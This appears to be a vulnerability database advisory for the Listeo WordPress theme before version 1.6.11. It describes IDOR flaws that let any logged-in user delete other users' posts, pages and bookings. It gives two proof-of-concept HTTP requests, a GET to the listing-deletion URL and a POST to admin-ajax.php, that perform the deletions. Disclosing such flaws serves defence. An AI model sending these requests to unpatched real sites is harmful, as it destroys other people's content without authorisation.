Themes Vulnerabilities

Listeo < 1.6.11 - Multiple Authenticated IDOR Vulnerabilities

Description

The theme did not ensure that the Post/Page and Booking to delete belong to the user making the request, allowing any authenticated users to delete arbitrary page/post and booking via an IDOR vector.

Proof of Concept

### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ]

[!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100

[!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1
Host: listeo.pro
Cookie: [user cookies]



### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: listeo.pro
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: [user cookies]

action=listeo_bookings_manage&booking_id=13&status=deleted

Affects Themes

Fixed in 1.6.11

References

Classification

Type
IDOR
CWE

Miscellaneous

Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
No

Timeline

Publicly Published
2021-05-16 (about 3 years ago)
Added
2021-05-16 (about 3 years ago)
Last Updated
2021-05-18 (about 2 years ago)

Other